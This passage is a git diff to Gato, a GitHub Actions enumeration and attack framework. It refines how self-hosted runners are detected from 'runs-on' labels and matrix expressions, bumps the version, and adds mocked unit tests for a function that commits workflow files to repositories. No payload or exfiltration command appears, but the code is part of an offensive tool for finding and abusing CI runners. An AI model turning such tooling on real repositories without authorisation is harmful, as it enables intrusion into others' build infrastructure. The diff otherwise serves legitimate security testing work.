+        'macOS-latest',
+        'windows-latest',
+        'ubuntu-18.04', # deprecated, but we don't want false positives on older repos.
+        'ubuntu-20.04',
+        'ubuntu-22.04',
+        'windows-2022',
+        'windows-2019',
+        'windows-2016', # deprecated, but we don't want false positives on older repos.
+        'macOS-13',
+        'macOS-12',
+        'macOS-11',
+        'macos-11',
+        'macos-12',
+        'macos-13',
+        'macos-13-xl',
+        'macos-12-xl',
+    ]
+
+    # Larger-runner style labels (e.g. ubuntu-22.04-8core-32gb) that are also
+    # treated as hosted; applied with re.match, so anchored at the start only.
+    LARGER_RUNNER_REGEX_LIST = r'(windows|ubuntu)-(22\.04|20\.04|2019|2022)-(4|8|16|32|64)core-(16|32|64|128|256)gb'
+    # Captures KEY from a '{{ matrix.KEY }}' expression.
+    MATRIX_KEY_EXTRACTION_REGEX = r'{{\s*matrix\.([\w-]+)\s*}}'
+
     def __init__(self, workflow_yml: str, repo_name: str, workflow_name: str):
         """Initialize class with workflow file.
 
@@ -54,13 +79,78 @@ def self_hosted(self):
            list: List of jobs within the workflow that utilize self-hosted
            runners.
         """
-
         sh_jobs = []
+        if 'jobs' not in self.parsed_yml:
+            return sh_jobs
+
         for jobname, job_details in self.parsed_yml['jobs'].items():
             if 'runs-on' in job_details:
                 runs_on = job_details['runs-on']
+                # Clear cut
                 if 'self-hosted' in runs_on:
                     sh_jobs.append((jobname, job_details))
+                elif isinstance(runs_on, str) and 'matrix.' in runs_on:
+                    # runs-on is a matrix expression: find the key it
+                    # references, then inspect the values listed for it.
+                    matrix_match = re.search(self.MATRIX_KEY_EXTRACTION_REGEX, runs_on)
+                    if not matrix_match:
+                        continue
+                    matrix_key = matrix_match.group(1)
+
+                    # Without a mapping-style strategy matrix there is
+                    # nothing to look the key up in.
+                    strategy = job_details.get('strategy')
+                    if not isinstance(strategy, dict):
+                        continue
+                    matrix = strategy.get('matrix')
+                    if not isinstance(matrix, dict):
+                        continue
+
+                    # Use previously acquired key to retrieve list of OSes
+                    if matrix_key in matrix:
+                        os_list = matrix[matrix_key]
+                    elif isinstance(matrix.get('include'), list):
+                        os_list = [
+                            inclusion[matrix_key]
+                            for inclusion in matrix['include']
+                            if isinstance(inclusion, dict) and matrix_key in inclusion
+                        ]
+                    else:
+                        continue
+
+                    # A lone label is checked as a whole rather than being
+                    # iterated character by character.
+                    if isinstance(os_list, str):
+                        os_list = [os_list]
+                    elif not isinstance(os_list, list):
+                        continue
+
+                    # We only need ONE to be self hosted, others can be
+                    # GitHub hosted
+                    for key in os_list:
+                        if not isinstance(key, str):
+                            continue
+                        if key not in self.GITHUB_HOSTED_LABELS and not re.match(self.LARGER_RUNNER_REGEX_LIST, key):
+                            sh_jobs.append((jobname, job_details))
+                            break
+                elif isinstance(runs_on, list):
+                    # Any GitHub-hosted or larger-runner label marks the
+                    # job as hosted; only otherwise is it reported.
+                    for label in runs_on:
+                        if label in self.GITHUB_HOSTED_LABELS:
+                            break
+                        if isinstance(label, str) and re.match(self.LARGER_RUNNER_REGEX_LIST, label):
+                            break
+                    else:
+                        sh_jobs.append((jobname, job_details))
+                elif isinstance(runs_on, str):
+                    # `continue` moves on to the next job; leaving the loop
+                    # here would drop every job that follows this one.
+                    if runs_on in self.GITHUB_HOSTED_LABELS:
+                        continue
+                    if re.match(self.LARGER_RUNNER_REGEX_LIST, runs_on):
+                        continue
+                    sh_jobs.append((jobname, job_details))
 
         return sh_jobs
 
diff --git a/pyproject.toml b/pyproject.toml
index 0378c85..7b29f9c 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
 
 [project]
 name = "praetorian-gato"
-version = "1.5.1"
+version = "1.6.0"
 description = "GitHub Actions Enumeration and Attack Framework"
 readme = "readme.md"
 authors = [
diff --git a/test/test_cases.json b/test/test_cases.json
index 57d1820..7c5b5bb 100644
--- a/test/test_cases.json
+++ b/test/test_cases.json
@@ -119,7 +119,7 @@
                 "type": "stdout"
             },
             {
-                "expect": "[+] The repository contains a workflow: main.yml that executes on self-hosted runners!",
+                "expect": "[+] The repository contains a workflow: main.yml that might execute on self-hosted runners!",
                 "type": "stdout"
             }
         ],
diff --git a/unit_test/test_api.py b/unit_test/test_api.py
index 4589a37..8899700 100644
--- a/unit_test/test_api.py
+++ b/unit_test/test_api.py
@@ -456,7 +456,7 @@ def test_retrieve_run_logs(mock_get):
 
     mock_get.return_value.json.return_value = {
         "workflow_runs": [
-            {"id": 123, "run_attempt": 1}
+            {"id": 123, "run_attempt": 1, "conclusion": "success", "head_branch": "dev", "path": ".github/workflows/build.yml@dev"}
         ]
     }
 
@@ -469,14 +469,14 @@ def test_retrieve_run_logs(mock_get):
     logs = abstraction_layer.retrieve_run_logs("testOrg/testRepo")
 
     assert len(logs) == 1
-    assert logs[0]['runner_name'] == 'ghrunner-test'
+    assert list(logs)[0]['runner_name'] == 'ghrunner-test'
 
     logs = abstraction_layer.retrieve_run_logs(
         "testOrg/testRepo", short_circuit=False
     )
 
     assert len(logs) == 1
-    assert logs[0]['runner_name'] == 'ghrunner-test'
+    assert list(logs)[0]['runner_name'] == 'ghrunner-test'
 
 
 @patch("gato.github.api.requests.get")
@@ -670,7 +670,10 @@ def test_create_branch(mock_get, mock_post):
     test_pat = "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
     mock_get.return_value.status_code = 200
 
-    mock_get.return_value.json.return_value = [
+    mock_get.return_value.json.side_effect = [
+        {
+            "default_branch": "dev"
+        },
         {
             "ref": "refs/heads/dev",
             "node_id": "REF_AAAAAAAAAAAAAAAAAAAAAAAAAAA",
@@ -698,7 +701,10 @@ def test_create_branch_fail(mock_get, mock_post):
     test_pat = "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
     mock_get.return_value.status_code = 200
 
-    mock_get.return_value.json.return_value = [
+    mock_get.return_value.json.side_effect = [
+        {
+            "default_branch": "dev"
+        },
         {
             "ref": "refs/heads/dev",
             "node_id": "REF_AAAAAAAAAAAAAAAAAAAAAAAAAAA",
@@ -920,3 +926,85 @@ def test_handle_ratelimit(mock_time):
     api._Api__check_rate_limit(test_headers)
 
     mock_time.sleep.assert_called_once()
+
+
+@patch('gato.github.api.requests.get')
+@patch('gato.github.api.requests.post')
+def test_commit_workflow(mock_call_post, mock_call_get):
+    # Arrange: queue four GET and four POST responses, all with success codes.
+    test_pat = "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+    api = Api(test_pat, "2022-11-28")
+    mock_call_get.side_effect = [
+        MagicMock(status_code=200, json=MagicMock(return_value={'default_branch': 'main'})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'sha': '123'})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'tree': {'sha': '456'}})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'sha': '789', 'tree': []}))
+    ]
+    mock_call_post.side_effect = [
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'abc'})),
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'def'})),
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'ghi'})),
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'jkl'}))
+    ]
+
+    # Act: run the commit flow against the mocked HTTP layer.
+    result = api.commit_workflow('test_repo', 'test_branch', b'test_content', 'test_file')
+
+    # Assert: third POST's 'sha' is returned; all queued responses consumed.
+    assert result == 'ghi'
+    assert mock_call_get.call_count == 4
+    assert mock_call_post.call_count == 4
+
+
+@patch('gato.github.api.requests.get')
+@patch('gato.github.api.requests.post')
+def test_commit_workflow_failure(mock_call_post, mock_call_get):
+    # Arrange: same queue as the success case, but the fourth POST returns 400.
+    test_pat = "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+    api = Api(test_pat, "2022-11-28")
+    mock_call_get.side_effect = [
+        MagicMock(status_code=200, json=MagicMock(return_value={'default_branch': 'main'})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'sha': '123'})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'tree': {'sha': '456'}})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'sha': '789', 'tree': []}))
+    ]
+    mock_call_post.side_effect = [
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'abc'})),
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'def'})),
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'ghi'})),
+        MagicMock(status_code=400, json=MagicMock(return_value={'sha': 'jkl'}))
+    ]
+
+    # Act: run the commit flow against the mocked HTTP layer.
+    result = api.commit_workflow('test_repo', 'test_branch', b'test_content', 'test_file')
+
+    # Assert: None is returned when the last POST fails; all calls were made.
+    assert result is None
+    assert mock_call_get.call_count == 4
+    assert mock_call_post.call_count == 4
+
+
+@patch('gato.github.api.requests.get')
+@patch('gato.github.api.requests.post')
+def test_commit_workflow_failure2(mock_call_post, mock_call_get):
+    # Arrange: only two POST responses are queued; the second returns 404.
+    test_pat = "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+    api = Api(test_pat, "2022-11-28")
+    mock_call_get.side_effect = [
+        MagicMock(status_code=200, json=MagicMock(return_value={'default_branch': 'main'})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'sha': '123'})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'tree': {'sha': '456'}})),
+        MagicMock(status_code=200, json=MagicMock(return_value={'sha': '789', 'tree': []}))
+    ]
+    mock_call_post.side_effect = [
+        MagicMock(status_code=201, json=MagicMock(return_value={'sha': 'abc'})),
+        MagicMock(status_code=404, json=MagicMock(return_value=None)),
+    ]
+
+    # Act: run the commit flow against the mocked HTTP layer.
+    result = api.commit_workflow('test_repo', 'test_branch', b'test_content', 'test_file')
+
+    # Assert: None is returned and no POST is attempted after the failing one.
+    assert result is None
+    assert mock_call_get.call_count == 4
+    assert mock_call_post.call_count == 2
diff --git a/unit_test/test_enumerate.py b/unit_test/test_enumerate.py
index d5601fb..22d346a 100644
--- a/unit_test/test_enumerate.py
+++ b/unit_test/test_enumerate.py
@@ -103,7 +103,7 @@ def test_enumerate_repo_admin(mock_api, capsys):
     }
 
     mock_api.return_value.retrieve_run_logs.return_value = [
-        {"machine_name": "unittest1", "runner_name": "much_unit_such_test"}
+        {"machine_name": "unittest1", "runner_name": "much_unit_such_test", "non_ephemeral": False}
     ]
 
     repo_data = json.loads(json.dumps(TEST_REPO_DATA))
@@ -143,7 +143,7 @@ def test_enumerate_repo_admin_no_wf(mock_api, capsys):
     }
 
     mock_api.return_value.retrieve_run_logs.return_value = [
-        {"machine_name": "unittest1", "runner_name": "much_unit_such_test"}
+        {"machine_name": "unittest1", "runner_name": "much_unit_such_test", "non_ephemeral": False}
     ]
 
     repo_data = json.loads(json.dumps(TEST_REPO_DATA))
@@ -183,7 +183,7 @@ def test_enumerate_repo_no_wf_no_admin(mock_api, capsys):
     }
 
     mock_api.return_value.retrieve_run_logs.return_value = [
-        {"machine_name": "unittest1", "runner_name": "much_unit_such_test"}
+        {"machine_name": "unittest1", "runner_name": "much_unit_such_test", "non_ephemeral": False}
     ]
 
     repo_data = json.loads(json.dumps(TEST_REPO_DATA))
@@ -222,7 +222,7 @@ def test_enumerate_repo_no_wf_maintain(mock_api, capsys):
     }
 
     mock_api.return_value.retrieve_run_logs.return_value = [
-        {"machine_name": "unittest1", "runner_name": "much_unit_such_test"}
+        {"machine_name": "unittest1", "runner_name": "much_unit_such_test", "non_ephemeral": False}
     ]
 
     repo_data = json.loads(json.dumps(TEST_REPO_DATA))
@@ -262,7 +262,7 @@ def test_enumerate_repo_only(mock_api, capsys):
     }
 
     mock_api.return_value.retrieve_run_logs.return_value = [
-        {"machine_name": "unittest1", "runner_name": "much_unit_such_test"}
+        {"machine_name": "unittest1", "runner_name": "much_unit_such_test", "non_ephemeral": False}
     ]
 
     repo_data = json.loads(json.dumps(TEST_REPO_DATA))
diff --git a/unit_test/test_repo_enumerate.py b/unit_test/test_repo_enumerate.py
index 3f049d4..3b2d23c 100644
--- a/unit_test/test_repo_enumerate.py
+++ b/unit_test/test_repo_enumerate.py
@@ -45,7 +45,7 @@ def test_enumerate_repo():
     }
 
     mock_api.retrieve_run_logs.return_value = [
-        {"machine_name": "unittest1", "runner_name": "much_unit_such_test"}
+        {"machine_name": "unittest1", "runner_name": "much_unit_such_test", "non_ephemeral": False}
     ]
 
     repo_data = json.loads(json.dumps(TEST_REPO_DATA))
@@ -75,7 +75,7 @@ def test_enumerate_repo_admin():
     }
 
     mock_api.retrieve_run_logs.return_value = [
-        {"machine_name": "unittest1", "runner_name": "much_unit_such_test"}
+        {"machine_name": "unittest1", "runner_name": "much_unit_such_test", "non_ephemeral": False}
     ]
 
     repo_data = json.loads(json.dumps(TEST_REPO_DATA))